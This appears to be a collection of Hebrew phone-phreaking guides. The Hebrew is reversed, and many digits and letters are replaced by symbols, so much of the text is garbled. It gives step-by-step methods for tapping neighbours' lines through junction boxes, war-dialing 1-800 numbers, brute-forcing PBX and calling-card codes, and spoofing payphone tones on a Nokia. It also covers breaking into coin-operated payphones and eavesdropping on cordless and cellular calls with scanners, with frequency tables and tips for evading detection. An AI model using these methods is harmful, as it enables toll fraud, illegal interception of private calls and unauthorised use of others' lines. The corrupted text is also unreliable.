הז טסקט תאירק בקע םרגנש קזנ לכל תוירחא םוש יל ןיא
םיניינע ןכות
!!!!!!!!!!!!
+% ה הז המ #N, Bo'
9% התיא תושעל רשפא המ
3% תואספוק הלאכ אוצמל רשפא #יא p
:% ליחתנ
=% תורעה
J% םיטידרק
+% ה הז המ #N, Bo'
!!!!!!!!!!!!!!!!!!
ה #N, Bo' תואספוקה ומכ אל ( אספוק תאז Blue הלא לכו Y
תולוכי תואספוקה ! תואספוק הלאכ אוצמל השק ( תועבטמ לע ןופלט דיל תאצמנש
ןופלטהמ תוקחורמ תויהל Y
#N, ה תספוקה תא שפחלו
9% התיא תושעל רשפא המ
!!!!!!!!!!!!!!!!!!!!!
יתימא ןובשחל ( יתימא וקל וקה תא תונשל לוכי התא אספוקה תא אצומ התא רשאכ
תועבטמ לע ןיוזמ ןופלט הזיא םתס אלו ! קזבב Y
3% תואספוק הלאכ אוצמל רשפא #יא p
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+9.
לוכי קחרמה ( תועבטמ לע םינופלט דיל אוצמל לוכי התא הלאה תואספוקה תא
דאמ בורק תויהל לוכי םג הזו ! דאמ קוחר תויהל Y %
וירחא בוקעת אוהשניאל טוח הזכ ןמ האור התאו ןופלטל #לוה תא דיגנ םא ,
וירחא בוקעל הסנת זא ! טוח סנכנ וילעש רוח הזכ ןמ האור התא םא וא %
:% ליחתנ
!!!!!!!!
+% #ירצ התאש םילכה םא התוא חתפתו אספוקה תא שפחת #ל %
9% םילבכ הלאכ ןמ תוארל רומא התא התוא חתופ התאש ירחא
ןופלט ירפסמה תא םש םושרש %
ףילחת זאו תועבטמה לע ןופלטה לש רפסמה תא שפחת ! וישכע
ליגר רפסמל ( רחא רפסמל ותוא Y %
3% םניחב םוקמ לכל ישפוח רשקתתו ליגרה ןופלטל התיניש ותואש ןופלטל #לת %
=% תורעה
!!!!!!!!
+% ומכ הז תאזה הטישה Beige Bo' , םניח תוחיש #ל ןתונ הז
התילע וילעש ןופלטל תתוצל #ל ןתונו %
9% ל רשקתת זא ! ליגרה וקל רבחתמ התאש ++* רפסמה תא #ל עימשי הז
תרבחתה וילעש ןופלט %
3% רשקתהל #לת התאש ! אספוקה םא עטקה לכ תא התישעש ירחא דיגנ םא
ליגר רשקתמ התאש וליאכ הארת התא ! #ב דושחל ולכוי אל %
By Boba Smith
+9;
קזנ לש תומודיקהו םידחוימה םירפסמה תמישר
&&& קזנ !קזנ !םתגייחש הדות &&&
ןאכ עדימ לכו םייקוח-יתלב םישעמ םישוע אל ונלש הצובקב $תורעה
טסקטב רומאה תא עצבל **ןיא**ו דבלב תוידומיל תורטמל אוה%
מ רוקמב דרוה הז %בוק www%ihc!net%org הז הצובקמ קלח ינאו%
םירפסמה תמישר h
+** ! הרטשמ
+*+ ! םודא דיוד ןגמ
+*9 ! שאה יבכמ
+*3 ! למשחה תרבח
+;; ! קזנ לש תוחוקל תוריש
+;. ! קזנ לש תוחוקל תורישל סקפ
++* ! "N, קזנ יאנכטל
+N= ! קזנ לש הציקי תוריש
+N+ ! םיקרבמ תוריש !ראודה תושר
+JJ ! קזנ לש םינוקית תוריש
+J: ! קזנ לש םידחוימ םינוקית תוריש
+3= ! ןמדזמ טנרטניא !טנקזנ תוריש
+3J ! תונוש תורבחל שומיש !דחוימ טנרטניא תוריש
+=+m ! רבוחמ התא וילא וקה לש ילוק אתה
+=3 ! ילוק את תורישל םיסקפ תחילש
+.99/+.3./+.:./+.. ! תימואלניב הייזכרמ
+3+ ! תבשחוממ תרוסמת !טנארשי
+:: ! ןיעידומ
+:9 ! תיטמוטוא אנייבוג תוריש
+== ! רבודה ןועשה
+:J ! םיפלחומ ןופלט ירפסמ לע עדימ
+*J ! ינוריע דקומ
N9 ! ירחא בוקע תוריש תלעפה
N3 ! ירחא בוקע תוריש לטיב
תוימלוסו תויבכוכ h
:9i ! #ילא רשקתהש ןורחאל גייח
:+i ! סופת רפסמ שיש הרקמל !קזנ לש היינח תוריש
:3i ! 0 תורשפא לטיב :9 וילא רשקתמ התאש ימל ההוזמ החישו
N3i ! סופתש הרקמב ירחא בוקע
N:i ! הנעמ ןיאש וא סופתש הרקמב ירחא בוקע
mN3 ! לוטיב N3 i
mN: ! לוטיב N: i
תומודיק h
+3*
+.** ! םניח תחיש
+NN ! %ראה ירוזא בורב דבוע אל !םניח תחיש
+N** ! םולשתב %ראה לכמ החיש
*+9 ! בהז יוק
*+3 ! קרב
*+: ! ימואלניב קזנ
+9+9 ! םולשתב %ראה לכמ החיש
*9 ! ןורמושו הדוהיו םילשורי רוזא
*3 ! זכרמהו ןד שוג רוזא
*: ! ןופצהו הפיח רוזא
*. ! םורדהו הלפשה רוזא
!!!! ילא ונפ אנא !םירפסמ דוע םיריכמ םתאש הרקמלt !!!!
םכלש דימת,
By AiTi
+3+
ירפסמ תקירס 1800
ללכב הז המ exhange scanning +
e'hange scanning .ןופלטב םישמתשמ םעפהש קר ' םיוסמ בוחרב םיתבה לכ לע הקיפד ומכ הז
מ דיגנ !ןופלט ירפסמ לש םיוסמ רוזא קרוס םצעב התא +.**!3**!*** דע +.**!3**!;;;
.אצומ התאש םינינעמ םירפסמ שפחמו
םהילא רבחתהל ןתינש םימדומ ירפסמ !ןופלטה תרבח לש םינוש יוסינ ירפסמ אוצמל רשפא
.םינוש םינינעמ םירפסמ דועו )םירקאהל רקיעב(
+קורסל ידכ ךירצ ינא המ
ןופלטל רבוחמ אוהו םדומ וב שיש בשחמ 3
הנכותה תא 3 Phone Tag .רתאב אוצמל ןתינש
+וישכע המ (הנכותה תא יתדרוה
$אבה #סמה תא הארת התא .הנכותה תא חתפת לכ םדוק
לע %חלת -ile F New dial list $אבה #סמה תא לבקתו
.םתוא קודבל הצור התאש םירפסמה חווט תא רוחבל #ירצ התא וישכע
לש םירפסמ תוסנל %ילממ ינא +.** .םכידיב הריחבה לבא !
+39
לע הצחל !םיצור התאש תינבתה תא ושיקה K .םירפסמה לכ לע הציחל ומכ היהת
לע וצחל 6/ לע זאו
9גייחל ליחתי םדומהו
.תואצותה תא #סמה לע וארת םתא גייחמ אוהש ןמזב
.רפסמ הזכ ןיאש םייוכיסה בור סופתכ םשרנש רפסמ לכ
כ םשרנ אלא סופתכ םשרנ אלש רפסמ לכ ומשרת carrier כ וא No carrier
.םהב שי המ וקדבתו םיסופת-אלה םירפסמה לכל ורשקתת ןכמ רחאלו
.וב שמתשהל ןיאו דבלב תוידומיל תורטמל אוה הז טסקט $תורעה
לעמ גייחל %ילממ אל ינא =** .הז לע תולעל הלוכי קזב !דחא םויב םירפסמ
.9ילא תואצותה תא םיחלוש םתא םישוע םתאש הקירס לכ ירחא
"קורסל וליחתת זא !םניח גויח הז $ורכזתו
By AiTi
+33
PBX
ינפל( םעפ = ב ומסרופש םידוקב םישנא הברה ושמתשה )#רעב םינש BB3 תוחיש תושעל ידכ
!םניח
)סש תא אנוש ינא ...ףוא( הנשויל הרטע ריזחי ינא הז טסקטבש הווקמ ינא
.ולאה םירבדה לכ ללכב הז המ
---------------------------
םילבלבתמ םימעפל !סקא.יב.יפ אל הז #יראמו !#יראמ אל הז סקא.יב.יפש ןיבהל #ירצ לכ םדוק
םניח תוחיש תושעל $הרטמ התואל םישמשמ םהש ןוויכמ ולאה תומשב
וא )קרב !בהז יווק !ימואלניב קזב( הלודג תוימואלניב תוחיש תרבחל #ייש ללכ #רדב #יראמ
!תימואלניב ןופלט תרבח
$תורטמ יתש שי ללכ #רדב #יראמל
+ ומכ( םייוסמ דוק תרזעב ןופלט ירפסמל רשקתהל ולכוי תורישה לע םימלשמה םישנאש .
)...טרכקזב
9 רשקתמ התא וב !ימעפ-דח גויח סיטרכ #ל םירכומ רשאכ םירשקתמ וילאש רפסמ תווהל .
.רשקתמו דוקה תא שיקמ !אוהשלכ רפסמל
לש םניח גויחה רוזאב םיאצמנ םיכיראמה ירפסמ לכ +.** ירוזאב םיכיראמ אוצמל לכות אלו !
.םירחא גויח
!טסקט הילע יתבתכש הקירסה תטישב שמתשהל ידכ #יראמ אוצמל ידכ
שי !גויח לילצ #ל ןתונ אוה וילא רשקתמ התא רשאכש רפסמ אצומ התא םא ;;l תאצמש
.#יראמ
.#יראמ תויהל בייח !גויחל דוקה תא #ממ שקבמה רפסמ ןכ ומכ
סנכה אנא $#ל דיגי יטומטואה לוקה ללכ #רדב לבא !דוקב שי תורפס המכ אוצמל #ירצ לכ םדוק
ה לעב דוקה תא . !שי תורפס המכ עדת #כו #לש תורפס
.תורפיסה רפסמ לע םיזמר םוש #ל ונתני אל םימעפל #א
"סקא.יב.יפל וישכע !יקוא
.הייזכרמ הל שי ללכ #רדבש !הלודג הרבח וזיאל #ייש היהי סקא.יב.יפ ללכ #רדב
םידבועל תוריש בורל םהב שי !תולודג םהש ןוויכמ סקא.יב.יפ שי חוטב תואטיסרבינואל $אמגוד(
שי דימתו !הדובע אשונב אוהשימל רשקתהלו דוק תתל !אוהשלכ רפסמל רשקתהל לש
)הייזכרמ תואטיסרבינואל
גייחל וכרטצי הרבחב םישנאה ללכ #רדב ; .גויח לילצ לבקל ידכ תרחא הרפיס לכ וא !
!םהלש דוקה תא שיקהלו וילא רשקתהל םירומא הרבחב םידבועש !רפסמ םצעב אוה סקא.יב.יפה
.םיקסע תורטמל !אוהשימל םניח גייחל ולכוי םה זאו
( םיליגר גויח ירוזאב םג אצמיהל םילוכי סקא.יב.יפ *3,*:,*. ( םניח תוחיש לש גויח רוזאב םגו )
+.** .)
!%ראה #ותב םירפסמל קר רשקתהל ללכ #רדב םילוכי םיכיראמ
.םלועב םוקמ לכל רשקתהל םילוכי םיסקא.יב.יפ !תאז תומעל
קלח 9 הלאה תוכרעמל הצירפב תולגתהל אל #יא $
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
ל ;;l דואמ ןכל !רשקתהש ימ תא אוצמלו !עגרב רתאל תורשפאה תא שי םיכיראמהמ
.בל ומישי אל תכרעמה ילהנמש ילב םהילא %ורפל ןכוסמ(השק
רשקתמה תא רתאל הדיחיה #רדהן !רתאל הריהמ #רד ןיא םבורלש אוה םיסקא.יב.יפ לש ןורתיה
( קזב לצא םימושירה תא קודבל איה &"M" !תרשקתה וילאש רפסמ לכ דעתמה יטנגמ טרס &
+3:
תוכרעמב םייק אוה !רשקתמה תא ותרזעב רתאל ןתינ ןיידע #א !בויח תורטמל שמשל רומא
)דבלב תושדח ןופלט
)הלאה םירבדה לע םיספתנ םירקירפ #יא $וא ( $תושעל אל המ
222222222222222222222222222222222222222222222222222222
+ ( רדסה יפל ינשה ירחא דחא םידוק הסנת לא . ***+,***9,***3,***: תא ובברעת אלא )...
.ילמודנר רדסב ויהיש #כ םידוקה
9 #יראמ(סקא.יב.יפ ותואל וגייחת לא . :** ....הזל בל ומישי ללכ #רדב !תחא העשב םימעפ
3 .םילמודנר םישרפה אלא !תוחישה ןיב ןמזב םיעובק םישרפה ויהי אלש .
םידוק תוסנל אלא בשחמב שומיש אלל !ןופלטה תרזעב דוקה תא אוצמל איה הבוט יכה #רדה
....קראפ 'תואס האור התאש ןמזב #מצעב םיבר
...דואמ רהמ ותומי םה #כ יכ !דחא לכל םתוא ואיבת לאו ועגתשת לא !םידוק םיאצומ התא םא
By AiTi
+3=
היקונב םילילצ תריציל ךירדמה
תורעהh
!nnnn!
הז #ירדמ תאירק בקע יהשלכ תוירחא אשונ בתוכה ןיאו !דבלב דומיל יכרוצל בתכנ הז #ירדמ%
םיכרצמh
nnnnnnn
ןשייה גוסהמ היקונ 9+9* ) 9+J* הבורמה היקונה הז !רבדמ ינא המ לע םיעדוי אל םתא םא -
םייתנש הזיא ינפל %ראה לכל היהש החודהו%%%
םיידי
חומ
רבסהh
nnnnn
00 היקונב 9+ יכרוצל הב םישמתשמ םהש הטיש הלגייש םמעושמ והשימ היהיש ןובשחב וחקל אל
הקידבו רקחמ%%%
הטישה ונל תנתונ המp
םלועב םוקמ לכל םניח רשקתהל !תועבטמ ןופלטל תרפרופשה תדמצה תעב תרשפאמ הטישה%%%
הלועפh
nnnnnn
לע וצחל !רישכמה תא וליעפתh
Menu
רותפכה לע רשייו
3N$
םכל דיגי אוה #כ רחאh
7ocation Nu4berh
םילילצב עומשל םיצור םתא ותואש ןורכיזה רפסמל הנווכה [$#M-]%
ןורכיז רפסמב ונילצא אצמנש !יסויל גייחל םיצור ונחנא דיגנ 33 %
םישיקמ ונחנא זא 33 לע םיצחולו 6/
לע %וחלל תורשפא ונל שי וישכע $#M- טירפתה לש רותפכה םצעב אוהש%%%
יסוי לש ןופלטה לש םירפסמה ילילצ תא קיפמ רישכמה...אלפ הזיאו%%%
ןופאלפה לש לוקמרה תא וילא דימצהלו ,םילקש+ תועבטמ ןופלט אוצמל הז !ונל רתונש המ וישכע
ונרמגו%%%
רוביח לילצ עומשל םיכירצ םתא%%%
הלועמ תדבוע הטישהו...םוקמ לכמ דובעל רומא הז !תיבב ןופלטה לע הטישה תא וסנתttt
הבינג לע םירוצע תויהל םילוכי םתא זא יכ...םכתוא וספתיי אלש רהזיהל #ירצש הז !ןכש המt
תנמרוחמה הרבחהש העדוהה תא םכלש רבחל םיעימשמ םתאש ודיגת טושפ....ששח לא לבא
הלילב לומתא םכל הריאשה םכלש%%%
העדוה יל וריאשת זא !םכלצא דובעת אל איה םאו...יידייב האצמנ הטישה $ןייצל בושח
תונטקה תויחוציפב םיאצמנ הלאה םינופלטה בורש...ועדתש םתס...והשמ דועו...םורופב
ונהת...בוהצ עבצב ללכ #רדבו לודג ןופלט תרוצב םינוינקבו !%וחב ללכ #רדב...םיקסויקבו
םוכיסלh
!!!!!!!
לבא !...#רוצ הזיאלו הב שמתשהל #יא עדייו הטישה תא אצמיי והשימש הז לע הבשח אל היקונ
תצק ולביק םה הארנכ...תלטובמ תאזה תורשפאה םישדחה היקונה ימגדב לבא...התעט היקונ
םישנאה לכש%%%
+3J
םירקירפלh
nnnnnnnnn
ה תא רוציל וישכע םילוכי םתא HR#1 םיפייט םוש ילב...הבר תוטשפב םיכירצ םתאש
ונב טלוש ןיידע ןשייהו בוטה פייטהש תורמל...םינגאלבו%%%
By CnTaX
+3N
םדיקפתו תונושה תואספוקה תמישר :
"cr)lic Bo' ! iתונשי ןופלט תוכרעמב הדיעו תחישו ההוזמ החיש !הניתממ החיש בונגל רומא
Beige Bo' ! קזב יאנכט לש םילכהמ דחא !ותושר אלל רחא והשימ לש ןופלטה וקב שומיש%
Black Bo' ! iהחישה לע בייוחי אל וז אספוקב שמתשמ התא רשאכ #ילא רשקתיש ימ%
Blotto Bo' ! הזב ושמתשת לא !רוזאב ןופלט תכרעמ לכ סורהל רומאt
Blue Bo' ! iםלועה לכל םניח תוחיש לבקל ידכ םינוטב שמתשמ%
Bus) Bo' ! אספוקה תא םילתושש ימ לצא ןופלטה לש תרושקתה תלוכי תא סורהל רומא%
&hartreuse Bo' ! #תריחב יפל תורחא תורטמל #לש ןופלטב למשחב שמתשמ%
&heese Bo' ! iירוביצ ןופלטל #לש ןופלטה תא #ופהל רומא
&ri4son Bo' ! #לש ןופלטל ןתמה רותפככ שמשמ%
Green Bo' ! iלש םילילצה תא רוציל #ל ןתונ &oin &ollect, &oin Return, Ringback
Neon Bo' ! ןופלטל ףסונ ןופורקימ ףיסומ%
Noise Bo' ! וקל שער ףיסומ%
6liVe Bo' ! ןופלטל ףסונ ןומעפכ שמשמ%
Red Bo' ! iבהראב םיירוביצ םינופלטמ םניח תוחיש תושעל #ל ןתונ
Rock Bo' ! ואירטס תכרעממ וא לוק סיטרכהמ !#לש ןופלטה וקל הקיסומ ףיסומ
8hite Bo' ! דיינ ןופלט ילילצ ןגייח
By AiTi
+3.
ריוואב םירדת תקירסל אלמה ךירדמה
תוקירס לע ילש טסקט םתארק רבכ םכקלחש חוטב ינא $המדקה,
ןופלט ירפסמ לש תוקירס לע רבודמ היה זא לבא%%%%
הנזאהו טוטיצ לש שדח םלוע !ריוואב םירדת לש תוקירס לע רבודמ ןאכ,
גניקירפ לש שדח חטש%%%
+% הז המ 3cannerppp
םצעב אוה רנקס walkie talkie ללכושמ דואמ
Xתוריינל קרוס םע ולבלבתת לאוtY
9% השוע אוה המppp
ומכ !םינוש םירדתב עדימ רדשלו טולקל לוכיש רישכמ אוה רנקס walkie talkie םצעב%
וליפאמ עדימ טולקל לוכי רנקסש הז הנושש המ = ש דועב !םירטמוליק walkie talkie
םומיסקממ עדימ טולקל לוכי 9** רטמ %
3% תושעל לוכי רנקס המp
םיאבה םירודישה תא טולקל לוכי התאו !ריוואב םינוש םירדתל ןיזאהל לוכי רנקסh
וידר
םייטוחלא םינופלט
דבלב לוק( היזיוולטY
םייגולנא םיירלולס םינופלט
הרטשמ לש רשק וידר
שא יבכמ לש רשק וידר
םודא-דוד-ןגמ לש רשק וידר
וכו םינולמ !תואטיסרבינוא !רפס יתב( תונוש חטבא תורבח לש רשק וידרoY
תוינומ
ןורטאיתב ומכ( םידיינ םינופורקימY
םיירלולס(םייטוחלא םינופלטל ןיזאמ התא רשאכ
יארשא יסיטרכ ירפסמו טרכקזב ירפסמ !םישנא לע עדימ טולקל לוכי התא%
:% רנקס תונקל לוכי ינא הפיא !יקואp
ןיב תולעל לוכי רנקסש ןיבהל #ירצ לכ םדוק 9** ל 9*** חש ,
הריכמל %ראב ותוא אוצמל דואמ השקו%
ומכ תויבמופ תוריכמ ירתאמ תונקל עיצמ ינא eba)%co4 לש רתאהמ וא uniden%co4 ינא םש
יתינק%
רקי אל שממ הזו לופכ חווט םכל תתל הלוכיש !תבחרומ הנטנא תונקל דואמ %ילממ ינא ןכ ומכ%
=% יטוחלא ןופלטב וגייח םישנא םירפסמ הזיאל אוצמל לוכי ינא #יאp
טושפ יד%%%
רבחלו )עקת(עקת( רכז(רכז אוהש תוינזוא לש לבכ תונקל #ירצ קר
ה תסינכל רנקסה לש תוינזואה תאיצי תא
audio in
בשחמה לש,
ןופלטה ילילצ יוהיז תנכות תא ליעפהלו X$#M-Y ןתינש
רתאב גישהל%
+3;
J% ןיזאהל #ירצ ינא םירדת הזיאלp
מ דחאל בישקהל תוסנל( $םייטוחלא םינופלא 9= םירדתה Y
Handset Base &hannel
!!!!!!! !!!! !!!!!!!
+ :3%N9* :.%NJ*
9 :3%N:* :.%.:*
3 :3%.9* :.%.J*
: :3%.:* :.%;9*
= :3%;9* :;%***
J :3%;J* :;%*.*
N ::%+9* :;%+**
. ::%+J* :;%+J*
; ::%+.* :;%9**
+* ::%9** :;%9:*
++ ::%39* :;%9.*
+9 ::%3J* :;%3J*
+3 ::%:** :;%:**
+: ::%:J* :;%:.*
+= ::%:.* :;%=**
+J :J%J+* :;%JN*
+N :J%J3* :;%.:=
+. :J%JN* :;%.J*
+; :J%N+* :;%NN*
9* :J%N3* :;%.N=
9+ :J%NN* :;%.3*
99 :J%.3* :;%.;*
93 :J%.N* :;%;3*
9: :J%;3* :;%;;*
9= :J%;N* :;%;N*
ומצע ןופלטה לש דצל אלו סיסבה לש דצל בישקהל תוסנל דואמ יאדכ
םיליכמ םה המו םיירשפאה םירדתה ראש תא וארת ןאכ $ראשה%
%רה הגמב םה םירדתה XMH1Y %רה וליקב אלו
N9 דע =: היזיוולט - -
.. דכ +*. וידר - - -M
+*. דע +3J םיסוטמ - -
+3J דע +:: אבצ - -
+:. דע +=*%J אבצ - -
+=9 דע +=3 תוינומ - -
+=: דע +== שא יבכמ - -
+== דע +=J הרטשמ - -
+=J דע +=. תוניפס - -
+=. דע +J* הרטשמ - -
+J9 דע +N: יתלשממ - -
+N: דע 99* היזיוולט - -
:=3 דע :=: הרטשמ - -
+:*
:=. דע :J* הרטשמ - -
By AiTi
+:+
תועבמ לע םידבועש םינופלל הצירפ
המדקהh
התייה הטישה םא םג !םניח תוחישל תרחא וא וז הטיש לע םתעמש רבכ םכקלחש חוטב ינא
ילש ןויער רוקמב%%%
ב דובעת האבה הטישה .*l לע קר ילוא דובעתש תרחא הטיש ומכ אל !םינופלטהמ =l %%%%
תועבטמ לעפומ ןופלט הז המ &o&otp
תועבטמ לע םידבועש םיירוביצה םינופלטה תא םיריכמ םתאp
אצמנ הבש תונחה לעבל !התוא הקיזחמה תרושקתה תרבחל םיכייש אלא קזבל םיכייש אל םה
וכו ןופלטהo%%
רפסמ םהל שי ןכ לבא !םהילא רשקתהל רשפא יאש הז ולאה םינופלטה םע תויעבה תחא%
לע אלו קסע(תיב לש ליגר וק לע םידבוע םהש הז ולאה םינופלטב דחוימש המ
םניח תוטיש הלאב חיוורהל תוטיש המכ שי הז ללגב !םיירוביצה םינופלטה ומכ דחוימ וק%%%
הטישה הנה זאth
llllllllllllll
וכו ןודעומב !םילוח-תיבב !ןוינקב !סהיבב( ףסכ לע לעפומש הזכ ןופלט ואצמת לכ םדוקoY
רפסמ וגייחתו וילא ושגית וישכע +.** ל ורשקתתש וא !אוהשלכ +;; וכו o,
רחא ףסכה תא ריזחי אוה !ומלשת זא שקבי ןכ אוה םא לבא !ףסכ #רטצי אל ןופלטה ללכ #רדב
#כ%%%
הרקמ םושב וקתנת לא( .םכל וקתניש דע !תויוטש דיגהל וליחתת זא ונעישכtY
וקתינש ירחא וישכע םיעמוש םתא המp
+% /rench
9% ממממממפב( "גויח לילצ%%%Y
םילאוש םתא הרק המpp
ןופלטה ידי לע רצוימש !ףייוזמ גויח לילצ ועמשת הלחתהב תרפרופשה תא םימירמ םתא רשאכ
וקב םיסלופה ידי לע אלו%%%%
םוקמ לכל רשקתהל םילוכי םתאו גויח לילצ םכל שי וישכעt
םיביגמ אל םישקמה גייחל הסנמ ינאש .רבדמ התא המ לע !עגרt
ןופלטה לש הבולע החטבא היה הז%%%
םכל שי וישכע 9 תויורשפא h
+% תונקל #one dialer ןופלטל םילילצה תא עימשהל ולכות זאו גויח ילילצ השועש !בהראמ%
9% םיסלופ לש הנשיה גויח תטישב שמתשהל%
#כ תדבוע הטישהh
הרפסה תא שיקהל ידכ + תרפרופשה תא םיחינמש הפיא( קותינה רותפכ לע תחא םעפ םישיקמ Y
הרפסה תא שיקהל ידכ 9 תרפרופשה תא םיחינמש הפיא( קותינה רותפכ לע םימעפ יתש םישיקמ Y
הרפסה תא שיקהל ידכ 3 תא םיחינמש הפיא( קותינה רותפכ לע םימעפ שולש םישיקמ
תרפרופשהY
היינש עבר #רעבל רותפכה לע םישיקמ%
שיקהל ידכ * םיצחול +* םימעפ %
םכלש תיבב ןופלטב הטישה תא תוסנל םילוכי םתאt
+:9
םלועה לכל רשקתהל םילוכי םתא וישכעt
ןיסל רשקתהל םתסו תיווכ !םינופאלפ !סקס ירפסמל רשקתתt
סונוב וישכעוt
תועבטמ ילעפומ םינופלטל %ורפל דציכ $סונוב +.%9%9**+
llllllllllllllllllllllllllllllllllllllll
ידי לע בתכנ "i#i
רשפא .ירוביצ ןופלטל רשקתהל םעפ םתיסינt
ןופלטה לעמ !הלעמל עיפומש רפסמ ול שי%%%
ל לבאcocot ףסכ וחיוורי הזה ןופלטה ילעבש ליבשב קר( ...רשקתהל רשפא-יאY
רפסמ ול ןיאש רמוא אל הז לבא,
ול תונשלו ותוא להנל ידכ !ןופלטה תא התנבש הרבחה םה הזה רפסמל םירשקתמש םידיחיה
תורדגה%
םישיקמ !ןופלטל לקש םיסינכמ םתא רפסמה תא גישהל יאדכ ++* ףסכה !רפסמה תא םימשור !
םכילא רוזחי,
רפסמה תא םכל שיוt
םירבד יתשמ דחא ועמשת םתא הזה רפסמל םירשקתמ םתא רשאכh
+% #תמסיס תא סינכהל #ממ שקבמה בשחוממ לוק
9% תוריהמב םדומ ...ןכ( רזומ םדומ לש לילצ 3** bIs ןופלט #ותבtY
תורדגה תונשל ולכות זאו !אמסיסה תא שחנל םיכירצ םתא ןושארה הרקמב%
אמסיס שקבי ןופלטה זא םגו לנימרט רפיה #רד ןופלטל רבחתהל םיכירצ םתא ינשה הרקמבו%
( החיש לש ריחמה תא תונשל םג ללג #רדב ולכות םתצרפש ירחא = תורוגא pY
By AiTi
+:3
םירדת
ה תשרב םירדת לש המישר $#M-%
הכומנ הצובק h
+, 9, 3, " r ;JNH(
:, =, J, B r NN* H(

N, ., ;, & r .9= H(
ההובג יכה הצובק
i * m $ r ;:+ H(
5 5 5 5
+9*;H( +33JH( +:NNH( +J33H(
& תילגנא בצמל רובעל אנ , &#R7s3H,- XילאמשY%
ל הדותh "i#i, fulian Macasse), NJ"R%
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
הז לע איצוי ינא םידמחנ ויהת םא ילואו םיווקה תא בורצל ןתינש םירישכמ לש המישר הנה
#ירדמ,
-$ ילוא הנש הזיא דוע .
המישרהh
Motorola 3&N9*9="h :
Motorola 3&N9*3:"h :
Motorola #7N9=N:"h :
Motorola #7N9J=;"h :
Motorola #7N9N9:"h :
Motorola #7N9N9J"h :
Motorola #7N9N33"h :
Motorola #7N9N3:"h :
Motorola #7N9NNN"h :
Motorola #7N9.JN"h :
Motorola #7N9.N;"h :
Motorola .***Hh :
Motorola Mltra &lassich :
M, H#=***h 3
Mercur) 9**h 9
Mitsubishi :J* K#"7h 9
Mitsubishi ===h +
Mitsubishi =J*h +
Mitsubishi J**h +
Mitsubishi N**h :
Mitsubishi .**h +
Mitsubishi ;**h +
Mitsubishi +=**h +
Mitsubishi Mark + 3*+h 9
Mitsubishi Mark + :*+h 9
Mitsubishi Mark + :=*h 9
Mitsubishi Mark + :==h 9
Mitsubishi Mark + =**h 9
Mitsubishi Mark + ===h 9
Mitsubishi Mark + =J*h 9
Mitsubishi Mark + J**h 9
Mobira M!3**h +
Mobira M!=3"h 3
Mobira M!=Nh +
Mobira #P" :/:**h +
Mobira #P" =/=**h +
Motorola 3&N9++="h :
Motorola 3&N9++;"h :
Motorola 3&N9+9:"h :
Motorola 3&N9+9J"h :
Motorola 3&N9+33"h :
Motorola 3&N9+3:"h :
Motorola 3&N9*9*"h :
Motorola 3&N9*9+"h :
$ia4ondtel 9**h +
$ia4ondtel ;*Kh +
$ia4ondtel ;=h +
$ia4ondtel Mesa =*h :/9
$ia4ondtel Mesa =9h :
$ia4ondtel Mesa =9"h :
$ia4ondtel Mesa ==h 9
$ia4ondtel Mesa =="Kh :
$ia4ondtel Mesa ==BKh :
$ia4ondtel Mesa J*h :
$ia4ondtel Mesa J*Kh :
$ia4ondtel Mesa .*h :
$ia4ondtel Mesa ;*Kh :
$ia4ondtel Mesa ;=h :
$ia4ondtel Mesa ;;Kh :
$LN" #"& 9***h 9
$)na #ac 9***Kh 9
$)na #ac :***h 9
$)na #ac :=**7h 9
$)na #ac :=**K7h 9
$)na #ac J***h 9
$)na #ac J***Kh 9
$)na #ac J***K7h 9
%-% fohnsonh 9
-ueitsu +N* P6R#"B7h +
-ueitsu +.3!,,Kh +
-ueitsu -M.*M!3J*h 9
-ueitsu -M.*M!3J9h 9
Gatewa) &P ;**h +
G 3tarh 9
Goldstar =***h +
Hitachi &R9+**h +
Hitachi &R9+**Hh +
"lIine ;=+*h +
"lIine ;=++h +
"4Is "77h 9
"ntel Radiant .39K7h 9
"ra Pro!&o44 +.**h +
"strotel =**h +
"strotel =.*h +
"strotel =;+h +
"#&# +N+*h +
"udiote/#oshiba &M#=**h 9
"udiotel B&!9*h 9
"udiotel &M#!+9=h 9
"udiotel &M#!+3=h 9
"udioVo' B&9*h 9
"udioVo' B&:*h +
"udioVo' B&:=h +
"udioVo' &M#!+9=h 9
"udioVo' &M#!+3=h 9
"udioVo' &M#+N**h +
"udioVo' &M#:**h +
"udioVo' &M#:*=h +
"udioVo' &M#:=*h +
"udioVo' &M#==*h +
"udioVo' &M#J**h +
"udioVo' &M#J*=h +
"udioVo' &M#N=*h +
"udioVo' &#K+=**h +
"udioVo' &#K9=**h +
"udioVo' &#K:***h +
"udioVo' &#K=***h +
&olt #ransIortableh +
$ia4ondtel +**h +
+::
By Pirs¡i]ng
ב היש ' תועבמ לע םידבועש םינופלב םניח תוחיש
לש םינופלטב םניח תוחיש תושעל הטיש &6&6# / Pirs[i]ng
&6&6# אוה ! u&usto4er 6wned &usto4er 6Ierated #eleIhoneu%
וכו ןוינק !הירפס!הדעסמב אצמנ רשא ןופלט - תרמוא תאזo%
רפסמ םהל שי תאז לכב לבא !םהילא גייחל רשפא יאש הלאה םינופלטב היעב שי%
רישכמה אצמנ ובש קסעה לעב הלא הלאה םירישכמה תא הקיזחמ אל קזב%
םניח תוחיש חיוורהל תוטיש המכ שי ןכל ירוביצ ןופלט לש ומכ וק לע דבוע אל רישכמה,
וישכע םכל דובעת איהש חוטב אל לבא םעפ הדבע איהש עדוי ינאש הטיש םכל הארי ינא הפ%
בל רתוי םימשו םירקירפמ רתוי רתוי םירהזנ םוי לכ הלאה םינופלטה תא םיקיזחמש םישנאה יכ
הזל%
חטבומ אל רבד םוש יכ דבוע אל הזש ראוד יל וחלשת לא דובעי אל קירטה םא זא%
שקובמה ןופלטל וכל X&6&6# דבלבY%
רוזאב םיריכמ םתאש םירפסמה דחאל וגייח +!.** םניח תוחיש( Y%
החישה תא םייקל םכל תושרהל רומא רישכמה%
הזכ והשמ וא תויוטש ורבדו םכל הנועש ימ םע רבדל וליחתה,
ותיא םתרבידש ימ אלא !םתקתנ אל םתאש חק החישה תא קתנל ול ומרגת%
דובעל רומא הזו הלחתהמ םתיצרש רפסמה תא וגייח ןכמ רחאל%
לעפי אל הז יכ ורתוו זא םימעפ הברה דבוע אל הז םא לבא בוש וסנ הנושאר םעפ דבוע אל הז םא%
&& ל הבר הדות ! /oli&hoice ! הפוריאמ קיתו רבח%
By Prising
+:=
